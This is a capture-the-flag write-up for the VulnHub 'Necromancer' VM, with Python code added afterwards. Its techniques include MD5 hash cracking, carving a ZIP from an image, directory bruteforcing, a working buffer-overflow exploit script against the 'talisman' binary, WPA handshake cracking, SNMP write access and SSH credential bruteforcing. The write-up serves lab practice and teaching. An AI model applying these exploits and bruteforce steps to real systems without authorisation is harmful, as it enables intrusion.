Intro
Hi, I thought I would do a little writeup on the CTF VM "Necromancer" from VulnHub. The VM is a bit older, but is supposed to be quite exciting. I think it is also a nice change from PicoCTF. The goal is to collect 11 flags.
Discovery and Scanning
After setting up the VM, I first searched for it with Netdiscover and found it.
First I ran an Nmap scan, and then got to run it a second time because my laptop crashed. Fortunately, nothing exciting had happened yet. During the new scan, I was surprised to find that Nmap didn't show me any open ports at all.
I thought I'd take a look at the traffic in Wireshark and noticed that the VM had tried to connect to my system on TCP port 4444.
So I decided to start a netcat listener and wait. And indeed I got a connection, but it was only a single transmission.
Suspicious data
It looks like Base64, so let's decode it. As output I get a small story and the first flag. At the end I see u666, which means UDP port 666.
Flag1 = flag1{e6078b9b1aac915d11b9fd59791030bf}
According to the story, I am supposed to "enchant" Flag 1, i.e. crack the hash back to its plaintext. First we have to find out what kind of hash this is. It looks like an MD5 hash to me. Let's see what Hash-Identifier says about it. And yep, it is an MD5 hash!
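The same identify-then-crack step comes up again for flags 4 and 7 later on. Here is an added example (my own code, not the author's) that pulls the hex digest out of a flag string, narrows the algorithm by digest length the way Hash-Identifier does, and runs a dictionary attack with the standard library. The wordlist and the plaintexts are constructed for the demo; a 32-character hex digest is only a hint for MD5, since MD4, NTLM and others have the same length.

```python
import hashlib
import re

# Digest length is the only thing a bare hex string tells you; 32 hex chars
# could be MD5, MD4 or NTLM, so treat the table as candidates to try, not a verdict.
CANDIDATES_BY_LENGTH = {32: ["md5"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}

FLAG_RE = re.compile(r"flag\d+\{([0-9a-fA-F]+)\}")


def hash_from_flag(flag):
    """Extract the hex digest from a string like flag1{e6078b9b...}."""
    m = FLAG_RE.fullmatch(flag.strip())
    if not m:
        raise ValueError("not a flagN{hex} string: %r" % flag)
    return m.group(1).lower()


def identify(digest):
    """Candidate hashlib algorithm names for a hex digest, by length."""
    return CANDIDATES_BY_LENGTH.get(len(digest), [])


def load_words(lines):
    """Wordlists usually come from a file; strip line endings, drop blanks."""
    for line in lines:
        word = line.rstrip("\r\n")
        if word:
            yield word


def dictionary_crack(digest, words):
    """Return (algorithm, plaintext) for the first word that matches, else None."""
    digest = digest.lower()
    words = list(words)  # we may iterate more than once, once per candidate algorithm
    for algo in identify(digest):
        for word in words:
            if hashlib.new(algo, word.encode()).hexdigest() == digest:
                return algo, word
    return None


# Constructed wordlist for the demo; in practice read rockyou or similar with load_words(open(path)).
SAMPLE_WORDS = list(load_words(["password\n", "necromancer\n", "\n", "opensesame\n", "blackmagic\n"]))

if __name__ == "__main__":
    target = hashlib.md5(b"opensesame").hexdigest()  # constructed target, hashed locally
    print(identify(target), dictionary_crack(target, SAMPLE_WORDS))
```

Because the flag hashes on this VM are unsalted MD5, the same function handles flags 1, 4 and 7; only the wordlist changes.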
Port UDP 666
Next, let's connect to UDP port 666 on the VM. It looks quite funny: I'm running out of air 😕
But what if I send the cracked hash? Oh nice, I get more of the story and even my 2nd flag.
e6078b9b1aac915d11b9fd59791030bf = opensesame
Flag2 = flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}
Port TCP 80
Next I'm supposed to go to port 80, where a little continuation of the adventure is waiting.
Here it says I see many birds and, very briefly, the Necromancer. In addition there is a pretty picture, otherwise nothing, no further references. I just downloaded the complete page. When I wanted to look at which path the picture lives under, I got a 403 and the information that this is an OpenBSD httpd. Well, I'll have a look at the downloaded files. In the source code there was nothing to see. After I had gone through everything except the image file, I took a closer look at the image itself. With hexdump, I then found my answer.
Stego in Image?
There is probably a text file hidden in the image. Let's see what Steghide, Zsteg or Foremost have to say about it. I have no luck with Steghide and Zsteg: Steghide wants a password and Zsteg doesn't recognize the image. But Foremost carved all the content out for me. I now have a zip file with the text file in it.
There is a Base64 string in there. If I decode it, I get my 3rd flag, as well as another hint: "Magic items".
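What hexdump and Foremost found is a ZIP archive appended to the image data, not real steganography. The following added example (my own code, not the page's) does the same carving by hand: it scans a byte blob for the ZIP local-file-header signature, tries to open the archive from each hit, and Base64-decodes the text file inside. The "image" here is a constructed sample (a PNG magic number followed by padding and an appended archive), not the CTF's real file.

```python
import base64
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"          # start of the first local file header in a ZIP
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def find_embedded_zips(blob):
    """Byte offsets of every 'PK\\x03\\x04' signature in blob (what you spot in hexdump)."""
    offsets = []
    pos = blob.find(ZIP_LOCAL_HEADER)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(ZIP_LOCAL_HEADER, pos + 1)
    return offsets


def carve_zip(blob, offset):
    """Treat blob[offset:] as a ZIP and return {member name: bytes}.

    Raises zipfile.BadZipFile if the signature was a false positive inside
    ordinary image data, which does happen in compressed formats like JPEG.
    """
    with zipfile.ZipFile(io.BytesIO(blob[offset:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def extract_hidden_files(blob):
    """Carve every valid ZIP found in blob; skip hits that are not real archives."""
    files = {}
    for off in find_embedded_zips(blob):
        try:
            files.update(carve_zip(blob, off))
        except zipfile.BadZipFile:
            continue
    return files


def decode_base64_members(files):
    """Base64-decode each carved member; the CTF hid its hint this way."""
    return {name: base64.b64decode(data) for name, data in files.items()}


def make_sample_image():
    """Constructed sample: PNG magic, 64 filler bytes, then an appended ZIP (not the real image)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("hidden.txt", base64.b64encode(b"constructed sample hint: Magic items"))
    return PNG_MAGIC + bytes(64) + buf.getvalue()


if __name__ == "__main__":
    sample = make_sample_image()
    print(find_embedded_zips(sample))
    print(decode_base64_members(extract_hidden_files(sample)))
```

On a real file, replace make_sample_image() with open("image.png", "rb").read(); the scan is the same thing `foremost -t zip` does, minus its heuristics for other file types.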
Flag3 = flag3{9ad3f62db7b91c28b68137000394639f}
Again I went over all the files with foremost, binwalk, hexdump and so on, but everything else seems to be clean. I looked at the source code of the page once more and decided to do a directory bruteforce. After a bit of googling I found a Wikipedia entry listing magic and occult items. I downloaded it with CeWL and turned it into a wordlist.
/opt/CeWL/cewl.rb -m4 -d0 -w wordlist-magic-items -v https://en.wikipedia.org/wiki/List_of_occult_terms
I ran the bruteforce with that wordlist and got an interesting result: a talisman 😄
The talisman is a file, in this case an ELF32 file, i.e. a binary.
Exploit the binary
Just run it! I am asked if I want to wear the talisman. Yes, of course I want to. But what's this? Nothing happens.
No matter what I enter I always get "Nothing happens" back. But when I entered a text that was too long, I got a Segmentation Fault. That's something 😄
I debug the binary with GDB and am happy to see that at 36 bytes of input I have overwritten the instruction pointer. That's already good, but where should I jump to?
Let's have a look with objdump at what functions and addresses are available. Here we have several functions:
08048a37 g F .text 00000aeb .hidden chantToBreakSpell
0804844b g F .text 00000052 .hidden unhide
080484f4 g F .text 00000035 .hidden myPrintf
0804849d g F .text 00000057 .hidden hide
08048529 g F .text 000004ea .hidden wearTalisman
I'll try the chantToBreakSpell function first: 32 bytes of padding and then its address 0x08048a37 written little-endian, so that it lands in EIP.
./talisman <<< $(python -c "print 'A' * 32 + '\x37\x8a\x04\x08'")
I guess that was a bull's eye. I get another piece of the storyline and my 4th flag. At the end, I get the hint that I should take a closer look at UDP port 31337.
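The one-liner above hardcodes the offset (32) that the author found by hand in GDB. As an added example (my own code, not the author's or the VM's), here is the usual way to get that number reproducibly: generate a non-repeating Metasploit-style pattern, feed it to the binary, read the garbage EIP value from GDB, and search the pattern for those four bytes. The same script then builds the ret2func payload for whatever offset and target address you pass in; the 0x08048a37 address and the 32-byte offset are taken from the page, everything else is illustrative.

```python
import itertools
import string
import struct
import sys

# Metasploit pattern_create style: Aa0Aa1...Aa9Ab0... so that any 4-byte window is unique
# within the first ~20 KB, which is plenty for a stack overflow like this one.
def pattern_create(length):
    chunks = []
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length].encode()


def pattern_offset(eip_value, length=2000):
    """Offset of the 4 bytes that ended up in EIP, or -1 if they are not from the pattern.

    eip_value is the register as GDB prints it (an int, e.g. 0x62413961); on x86 the
    register holds the bytes in little-endian order, so pack it that way before searching.
    """
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def build_payload(offset, target_addr, filler=b"A"):
    """Padding up to the saved return address, then the target address little-endian."""
    return filler * offset + struct.pack("<I", target_addr)


if __name__ == "__main__":
    # Usage: python3 exploit.py pattern 200        -> prints a 200-byte pattern to feed the binary
    #        python3 exploit.py offset 0x62413961  -> offset for the EIP value GDB showed
    #        python3 exploit.py payload 32 0x08048a37 | ./talisman
    mode = sys.argv[1] if len(sys.argv) > 1 else "payload"
    if mode == "pattern":
        sys.stdout.buffer.write(pattern_create(int(sys.argv[2])) + b"\n")
    elif mode == "offset":
        print(pattern_offset(int(sys.argv[2], 16)))
    else:
        offset = int(sys.argv[2]) if len(sys.argv) > 2 else 32       # value found on this page
        target = int(sys.argv[3], 16) if len(sys.argv) > 3 else 0x08048a37  # chantToBreakSpell
        sys.stdout.buffer.write(build_payload(offset, target) + b"\n")
```

Note the little-endian packing: writing the address as the bytes 37 8a 04 08 is exactly what the author's '\x37\x8a\x04\x08' does by hand, and struct.pack("<I", ...) is the same thing without the chance of a typo.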
Flag4 = flag4{ea50536158db50247e110a6c89fcf3d3}
Port UDP 31337
Arriving at the port, I get "Nothing happens". No output, nothing else. I am supposed to enchant flag 4, which again means hash cracking.
ea50536158db50247e110a6c89fcf3d3 = blackmagic
I connect to the port and look at what happens there. It works much like UDP port 666 did with the 2nd flag. So "blackmagic" hits the mark, and I get another piece of the story and my 5th flag. Now I have to visit a new URL.
Flag5 = flag5{0766c36577af58e15545f099a3b15e60}
Back to port TCP 80
There I directly get the 6th flag. Here the story tells us that we will meet the Necromancer.
Flag6 = flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}
On that path we are offered a file called "necromancer". Let's download it, since nothing else provides any more information. It is a bzip2 archive containing a "necromancer.cap" file. After a longer look I see that it holds a captured WPA/WPA2 handshake. So I start Aircrack-ng and crack the pre-shared key.
After cracking the WPA/WPA2 password, the story tells me to connect to UDP port 161.
Port UDP 161
No sooner said than done: I connected to port 161 and got "Nothing happens". "Nothing happens" seems to be a running gag in this CTF.
After a longer round of googling I figured out that a real service might be running there after all. Once I noticed that this port belongs to the SNMP protocol, I had to read the manuals. After several attempts with snmpwalk, I got a bit further.
After hours of dealing with the horrible SNMP protocol and not really understanding what exactly does what there, I searched all the forums and asked for help on how to work with SNMP.
What I had to do was replace the string "Locked - death2allrw" with "Unlocked". The snmpset below uses death2allrw (the second half of that string) as the read-write community and writes to .1.3.6.1.2.1.1.6.0, which is sysLocation in the standard MIB-2 system group:
snmpset -v 2c -c death2allrw 192.168.1.103 iso.3.6.1.2.1.1.6.0 s "Unlocked"
After all that fumbling, we finally move on and get our next clue and flag number 7.
Flag7 = flag7{9e5494108d10bbd5f9e7ae52239546c4}
Port TCP 22
When connecting to TCP port 22, I find, as I suspected, that this is an SSH service. I cracked the hash from the 7th flag once more and got "demonslayer" as output.
With this I tried to log in as root. But, oh wonder, that did not work. My guess is that I can get further with some enumeration. I created a small list of all the commands from this CTF. After a few minutes, I got the result that demonslayer is a user. So now I have to find out the password.
After a few seconds I run into the right password. I log in and am greeted by an ASCII painting.
Here we find a text file called "flag8.txt". At this point we have reached the fight with the Necromancer. We are supposed to fend off his attack on UDP port 777.
Port UDP 777
After I tried several times to connect to this port from outside and nothing came of it, I wondered whether it might make more sense to connect to it on localhost from the SSH session. From that point on I sat for about 5-6 hours trying to understand what exactly I was supposed to do here.
Because things came up here that exceed my mental horizon.
For those like me who don't really have a clue about the D&D and magic stuff, I have included the full run here.
Connection to localhost 777 port [udp/*] succeeded!
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 2 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 1 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 0 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
!!!!!!! You have been defeated by The Necromancer! (*_*) !!!!!!!
Connection to 192.168.43.170 closed by remote host.
Connection to 192.168.43.170 closed.
The above is what you get if you fail like I did :D. Then you can quietly start everything again from the beginning. From here on it's time to google, and if necessary start over from the beginning again. The best approach is to send everything that sounds like magic or something similar as an answer.
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path? Kelewan
flag8{55a6af2ca3fee9f2fef81d20743bda2c}
Defend yourself from the Necromancer's Spells!
Who did Johann Faust VIII make a deal with? Mephistopheles
flag9{713587e17e796209d1df4c9c2c2d2966}
Defend yourself from the Necromancer's Spells!
Who is tricked into passing the Ninth Gate? Hedge
flag10{8dc6486d2c63cafcdc6efbba2be98ee4}
A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.
Fortunately, from here on nothing more comes up that needs googling.
From here I end up back in the normal shell of the VM. Now the story says I should search for something that contains the word "vile".
Flag8 = flag8{55a6af2ca3fee9f2fef81d20743bda2c}
Flag9 = flag9{713587e17e796209d1df4c9c2c2d2966}
Flag10 = flag10{8dc6486d2c63cafcdc6efbba2be98ee4}
Rootflag
For this there is the locate command; I used it and ended up in the home directory.
I read the file, and in the last sentence I am told that I now have power. Does that mean I have root rights from now on? No, I do not!
I simply tried to read the file flag11.txt in the root directory, as I did with flag 8. Apparently I had been given the rights to do so.
This gives me my 11th flag.
Flag11 = flag11{42c35828545b926e79a36493938ab1b1}
With this, the CTF is done. I would like to say that this is quite an interesting VM. What upset me several times, however, were the SNMP part and the fight against the Necromancer. Otherwise it was quite a fun CTF.
For those who do not want to start all over again when they lose to the Necromancer, I have built a small script that takes you straight to him.
https://github.com/strider-paff-shell/Necromancer-Autorun
I hope the writeup went down well. Until next time 😄